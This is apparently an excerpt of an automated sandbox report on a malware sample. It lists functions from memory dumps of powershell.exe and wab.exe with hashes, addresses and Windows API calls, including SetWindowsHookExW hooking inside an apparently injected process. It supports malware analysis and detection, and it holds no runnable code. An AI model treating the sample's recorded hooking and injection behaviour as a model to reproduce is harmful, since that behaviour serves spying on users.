                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                        • API String ID: 0-3272787073
                                                                                                        • Opcode ID: 40083e2da3cbda0347140446c97d42f79e748341c99b9e1fc8e4c1d1ef628f2c
                                                                                                        • Instruction ID: c51eb48609a87d7803e42fc9fd9338baca7180a88d41b5582d9bb5e21c0e342f
                                                                                                        • Opcode Fuzzy Hash: 40083e2da3cbda0347140446c97d42f79e748341c99b9e1fc8e4c1d1ef628f2c
                                                                                                        • Instruction Fuzzy Hash: 903135B3B14347EFCF294B68940417EB7F1ABC5610B24847AD9268F245DB32C855C752
                                                                                                        Function 07AA22E9 Relevance: 6.3, Strings: 5, Instructions: 82COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$$^q$$^q$$^q$$^q
                                                                                                        • API String ID: 0-2825857601
                                                                                                        • Opcode ID: fc79a16e6b4383eff4a20df29ade5ed5e0168472f9f3305e50f678bc86affa7e
                                                                                                        • Instruction ID: 61b35ef56efab7f267ef0c7bd89fdbbfd73ced4543523131a5515cbfbae226e0
                                                                                                        • Opcode Fuzzy Hash: fc79a16e6b4383eff4a20df29ade5ed5e0168472f9f3305e50f678bc86affa7e
                                                                                                        • Instruction Fuzzy Hash: D32177B1A1020AFBDB2C4F06C544B7577A8BBC2A51F19807AE9248B2D5CB71C8A4C7B1
                                                                                                        Function 07AA00F0 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $^q$$^q$$^q$kl$kl
                                                                                                        • API String ID: 0-4246339534
                                                                                                        • Opcode ID: 971ca19cf99e68bb27e2cec45d0f41824da625322efbc058c874ff6d5c06e753
                                                                                                        • Instruction ID: 092789d5482437683411566accbfa2d5a90ddec0419d767fc6f8433f7df290f4
                                                                                                        • Opcode Fuzzy Hash: 971ca19cf99e68bb27e2cec45d0f41824da625322efbc058c874ff6d5c06e753
                                                                                                        • Instruction Fuzzy Hash: 5F1129B1700306BBEB244A1AD804BA7F7AAABC1760F24842AE4598B350FB32C485C350
                                                                                                        Function 07AAD630 Relevance: 5.4, Strings: 4, Instructions: 393COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ful$(ful$(ful$(ful
                                                                                                        • API String ID: 0-100295639
                                                                                                        • Opcode ID: 0118f432e119bcca86a79d30e4756334dcc63e75e5eec1d12b6eb92c0764c222
                                                                                                        • Instruction ID: 2d6f1e0a434b9d8030a5413d897ac2169fc0a41a4bc012a8769ddd0fc96724a7
                                                                                                        • Opcode Fuzzy Hash: 0118f432e119bcca86a79d30e4756334dcc63e75e5eec1d12b6eb92c0764c222
                                                                                                        • Instruction Fuzzy Hash: CCF180B4B00205EFDB14CF58C541A6ABBB2BFC9314F14C529D865ABB58DB72EC42CB91
                                                                                                        Function 07AA7090 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ful$(ful$(ful$(ful
                                                                                                        • API String ID: 0-100295639
                                                                                                        • Opcode ID: 2efbe17590f29aa635d8777c6e8d15c0468bb4a3e6ab03e5961e7a3c3ac05e4c
                                                                                                        • Instruction ID: d11a9d9d0fee2f3972fd1c360fbcc50638795afab2d3a7261deb77e689b73b58
                                                                                                        • Opcode Fuzzy Hash: 2efbe17590f29aa635d8777c6e8d15c0468bb4a3e6ab03e5961e7a3c3ac05e4c
                                                                                                        • Instruction Fuzzy Hash: 1F716DB0A00205EFCB14CF58C955EAABBF2FF89314F148169D814AB765DB32EC95CB91
                                                                                                        Function 07AA30D8 Relevance: 5.2, Strings: 4, Instructions: 151COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 84sl$84sl$tP^q$tP^q
                                                                                                        • API String ID: 0-3511852971
                                                                                                        • Opcode ID: c51af8e1c4e510696c99d7befef82615f87d7b2973e97c019a6c4f098afcc71e
                                                                                                        • Instruction ID: 7ec56c333e4342cd05259c28bdd615d7bba1e0f0679f65470bd2351d94e4cff1
                                                                                                        • Opcode Fuzzy Hash: c51af8e1c4e510696c99d7befef82615f87d7b2973e97c019a6c4f098afcc71e
                                                                                                        • Instruction Fuzzy Hash: 0F4125B1B04355BFCF248B69D804A6ABBA6EBC5710F18C46AE5588F251CB32DC45C7A1
                                                                                                        Function 07AA0CB8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $^q$$^q$$^q$$^q
                                                                                                        • API String ID: 0-2125118731
                                                                                                        • Opcode ID: 08b38033faf211d25c241a62807b5b00623cbb9b62dbcd7b0e79737bb2d89821
                                                                                                        • Instruction ID: 3cc1ebc4c1dab6cb0374ad647ff0862ee1dcd1d31fd9f5768ae398b3fd03b423
                                                                                                        • Opcode Fuzzy Hash: 08b38033faf211d25c241a62807b5b00623cbb9b62dbcd7b0e79737bb2d89821
                                                                                                        • Instruction Fuzzy Hash: E2216BB230031A7BD7385A7A9804B2777EA9BC1714F24842EE815CF385EE75D8448361
                                                                                                        Function 07AA7EE6 Relevance: 5.1, Strings: 4, Instructions: 70COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $^q$$^q$$^q$$^q
                                                                                                        • API String ID: 0-2125118731
                                                                                                        • Opcode ID: 6feae1dc3f5948d4ff0b220a40f2ac2e2d35357427f767f78298a8d5d273026b
                                                                                                        • Instruction ID: 4f71ed777e1ef016db54d9282dd2b65adc8e68a85da105de502d7458784b81ce
                                                                                                        • Opcode Fuzzy Hash: 6feae1dc3f5948d4ff0b220a40f2ac2e2d35357427f767f78298a8d5d273026b
                                                                                                        • Instruction Fuzzy Hash: 5321F0B6A00207FFDB258F29C5406BBB7F1AFC5211F18417AD8288B201DB32C649C7A1
                                                                                                        Function 07AA174B Relevance: 5.1, Strings: 4, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                        • API String ID: 0-2049395529
                                                                                                        • Opcode ID: a1a3c42744150b884ae9cb23272386f4cd6bd3f5619924f27f56e7992fcc892b
                                                                                                        • Instruction ID: f1b232d601ea7eea7aa16b84cd1e0ca6e09ffd6cb438a11557cc9ccf236c3956
                                                                                                        • Opcode Fuzzy Hash: a1a3c42744150b884ae9cb23272386f4cd6bd3f5619924f27f56e7992fcc892b
                                                                                                        • Instruction Fuzzy Hash: 46014771B0D38A6FC32B822858200A5AFF28FC3590B1A04DBC041CF397DE254C4D8BA2

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:6.1%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:14
                                                                                                        Total number of Limit Nodes:2
                                                                                                        execution_graph 14139 3272270 14141 32722b4 SetWindowsHookExW 14139->14141 14142 32722fa 14141->14142 14143 3277370 DuplicateHandle 14144 3277406 14143->14144 14129 3277128 14130 327716e GetCurrentProcess 14129->14130 14132 32771c0 GetCurrentThread 14130->14132 14133 32771b9 14130->14133 14134 32771f6 14132->14134 14135 32771fd GetCurrentProcess 14132->14135 14133->14132 14134->14135 14136 3277233 14135->14136 14137 327725b GetCurrentThreadId 14136->14137 14138 327728c 14137->14138

                                                                                                        Executed Functions

                                                                                                        Function 03277125 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 032771A6
                                                                                                        • GetCurrentThread.KERNEL32 ref: 032771E3
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 03277220
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 03277279
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.2900053542.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_3270000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$ProcessThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2063062207-0
                                                                                                        • Opcode ID: d2420571328d07019adc1476da036a823f0ab39cf3a69c08a54aaa17f46fd835
                                                                                                        • Instruction ID: 2cc84483a23b22fdaad260c8a3be8a9c317c143e08f775b821e88f7c40153108
                                                                                                        • Opcode Fuzzy Hash: d2420571328d07019adc1476da036a823f0ab39cf3a69c08a54aaa17f46fd835
                                                                                                        • Instruction Fuzzy Hash: AC5156B4910209CFDB04CFA9D548BAEBBF1BF48304F24C029E059AB360DB35A984CF65
                                                                                                        Function 03277128 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 032771A6
                                                                                                        • GetCurrentThread.KERNEL32 ref: 032771E3
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 03277220
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 03277279
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.2900053542.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_3270000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$ProcessThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2063062207-0
                                                                                                        • Opcode ID: a88b3c947f80d51cae0971dc4f8e131c7eeefa42da57561c96b9d6c60382345c
                                                                                                        • Instruction ID: f4b11e90075796c4bb27108150e7b56b6186740921e475cace91159db4d5ce60
                                                                                                        • Opcode Fuzzy Hash: a88b3c947f80d51cae0971dc4f8e131c7eeefa42da57561c96b9d6c60382345c
                                                                                                        • Instruction Fuzzy Hash: 2B5145B4910209CFDB14CFA9D548BAEBBF1BF48304F24C429E459AB360DB75A984CF65
                                                                                                        Function 03277368 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 66 3277368-327736d 67 327735f-3277367 66->67 68 327736e-3277404 DuplicateHandle 66->68 67->66 69 3277406-327740c 68->69 70 327740d-327742a 68->70 69->70
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 032773F7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.2900053542.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_3270000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: fe890cde67c7a11d8f2562ff4d0324d3e40b5a790572d8d010dbcf3951754127
                                                                                                        • Instruction ID: 90c9b0759024dbc96b3dd85bfa1ebfb057e33080641f35402d0ac37ffa91889e
                                                                                                        • Opcode Fuzzy Hash: fe890cde67c7a11d8f2562ff4d0324d3e40b5a790572d8d010dbcf3951754127
                                                                                                        • Instruction Fuzzy Hash: 433123B59043499FCB11CFA9D984AEEBFF4EF49210F14805AE954E7251C378A944CB61
                                                                                                        Function 03277370 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 73 3277370-3277404 DuplicateHandle 74 3277406-327740c 73->74 75 327740d-327742a 73->75 74->75
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 032773F7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.2900053542.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_3270000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: 9cd47ff41ff614eed70d6c839b564e6f91eee0faeb7cd177a808a66e36bd204d
                                                                                                        • Instruction ID: 340cf4c3ca1a153eabbcf80d822625eed6250d0374c2891d185c1ef83a18f45e
                                                                                                        • Opcode Fuzzy Hash: 9cd47ff41ff614eed70d6c839b564e6f91eee0faeb7cd177a808a66e36bd204d
                                                                                                        • Instruction Fuzzy Hash: C721E0B59002499FDB10CFAAD984AEEBFF4EB48320F14801AE958A7210D374A944CFA5
                                                                                                        Function 03272268 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 78 3272268-32722ba 80 32722c6-32722f8 SetWindowsHookExW 78->80 81 32722bc 78->81 82 3272301-3272326 80->82 83 32722fa-3272300 80->83 84 32722c4 81->84 83->82 84->80
                                                                                                        APIs
                                                                                                        • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 032722EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.2900053542.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_3270000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HookWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 2559412058-0
                                                                                                        • Opcode ID: 0cafa35106e0b9b39e481192e6c146832815b7d5aff23b4fe621ab532b0b7287
                                                                                                        • Instruction ID: a91de13bb777cc118a4ba340d273907432dfa3e83cda7bd564e732ed395a1364
                                                                                                        • Opcode Fuzzy Hash: 0cafa35106e0b9b39e481192e6c146832815b7d5aff23b4fe621ab532b0b7287
                                                                                                        • Instruction Fuzzy Hash: CD2120B5D002098FCB14CFA9C944BEEBBF1AF88314F14882AD459A7250CB74A985CFA5
                                                                                                        Function 03272270 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 88 3272270-32722ba 90 32722c6-32722f8 SetWindowsHookExW 88->90 91 32722bc 88->91 92 3272301-3272326 90->92 93 32722fa-3272300 90->93 94 32722c4 91->94 93->92 94->90
                                                                                                        APIs
                                                                                                        • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 032722EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.2900053542.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_3270000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HookWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 2559412058-0
                                                                                                        • Opcode ID: cd210df10df6e5101812f82effc200fbd0a8e4c6e1abe3043d4252c93ea07035
                                                                                                        • Instruction ID: 420a78603b74cd7eb491669cfc9247d0a1d9ea618e32336603edadd74e66003c
                                                                                                        • Opcode Fuzzy Hash: cd210df10df6e5101812f82effc200fbd0a8e4c6e1abe3043d4252c93ea07035
                                                                                                        • Instruction Fuzzy Hash: B221F3B1D002098FCB14CFAAC944BEEFBF5EB88314F148429D459A7250C774A984CFA5
                                                                                                        Function 0323D238 Relevance: .1, Instructions: 76COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.2899761603.000000000323D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0323D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_323d000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8c595be5ef2b0c5fd116394f8ffedbcb8b582bdf4f6fa50e0fcb3e32d30c3aae
                                                                                                        • Instruction ID: 80bf5af7fd358e7d243cad5938e3706fe3ef587ac840c410447ac8fe6d83fb3e
                                                                                                        • Opcode Fuzzy Hash: 8c595be5ef2b0c5fd116394f8ffedbcb8b582bdf4f6fa50e0fcb3e32d30c3aae
                                                                                                        • Instruction Fuzzy Hash: 032145B1618200DFCB05CF14D9C4F2ABF65FB89314F24C5A9E8090B246C376D896CBA2
                                                                                                        Function 0323D500 Relevance: .1, Instructions: 75COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.2899761603.000000000323D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0323D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_323d000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4ef8a0e5c10cb37acef2311d15160f99c8fd6be91d785d2ffb27dac6d5c15e8c
                                                                                                        • Instruction ID: 4fef1d618de9702b538782d425d6156d51287edc7e9d9fee9c1b7774629d0ac9
                                                                                                        • Opcode Fuzzy Hash: 4ef8a0e5c10cb37acef2311d15160f99c8fd6be91d785d2ffb27dac6d5c15e8c
                                                                                                        • Instruction Fuzzy Hash: 4C2125F1514204DFDB05DF14D9C0B27BF65FF99318F24C1A9E9090B256C376D896CAA2
                                                                                                        Function 0324D0FC Relevance: .1, Instructions: 72COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.2899835090.000000000324D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0324D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_324d000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b3dd7bdc5b1170baab07c4cb96f11bbd3abae34bca2ce2470d079394e524cd33
                                                                                                        • Instruction ID: 36bfbde99111798a7923444554238b0495c848bcff22c3064b9e651b2ba04f31
                                                                                                        • Opcode Fuzzy Hash: b3dd7bdc5b1170baab07c4cb96f11bbd3abae34bca2ce2470d079394e524cd33
                                                                                                        • Instruction Fuzzy Hash: 4E213470610200DFDB09DF14C9C4B26BBA5EB88B14F24C5ADDC0D4B257C37AD886CA61
                                                                                                        Function 0323D233 Relevance: .1, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.2899761603.000000000323D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0323D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_323d000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b42aea87c287ac2611f413213999344df767c422ba16a938a9aaaad224125670
                                                                                                        • Instruction ID: f7d3cd5c0462c34a112c7a341bf1cae6ef21cadceeb589fb82ee1ac0a87ccf51
                                                                                                        • Opcode Fuzzy Hash: b42aea87c287ac2611f413213999344df767c422ba16a938a9aaaad224125670
                                                                                                        • Instruction Fuzzy Hash: A621DFB6504241CFCB06CF10D9C4B16BF72FB84314F28C1AADC090B656C33AD46ACBA2
                                                                                                        Function 0323D4FB Relevance: .1, Instructions: 56COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.2899761603.000000000323D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0323D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_323d000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c00ff5ec2e29744080c8e4ca07c56d5aae589f0b8178e9ac1d3c5e2fd933a73b
                                                                                                        • Instruction ID: f7054b3f3788166a2039fef6dd669d7368af429ab252b287f016c1fd32a21d57
                                                                                                        • Opcode Fuzzy Hash: c00ff5ec2e29744080c8e4ca07c56d5aae589f0b8178e9ac1d3c5e2fd933a73b
                                                                                                        • Instruction Fuzzy Hash: 4311B1B6504244CFDB16CF10D5C4B16BF61FF95314F28C5AADC490B256C336D49ACBA2
                                                                                                        Function 0324D0F7 Relevance: .1, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.2899835090.000000000324D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0324D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_324d000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 956aa6f20416cd9377d0a52e9aa7395f1f41f4841687125cb0d478f9e6b3f514
                                                                                                        • Instruction ID: 930f8e08305084e23ee3977807e9ab82933bae4e9858323f0b1edaf1ba2aea0d
                                                                                                        • Opcode Fuzzy Hash: 956aa6f20416cd9377d0a52e9aa7395f1f41f4841687125cb0d478f9e6b3f514
                                                                                                        • Instruction Fuzzy Hash: 6211BB75504280CFDB0ACF14D9C4B15BBA1FB84614F28C6AADC494B256C33AD48ACB62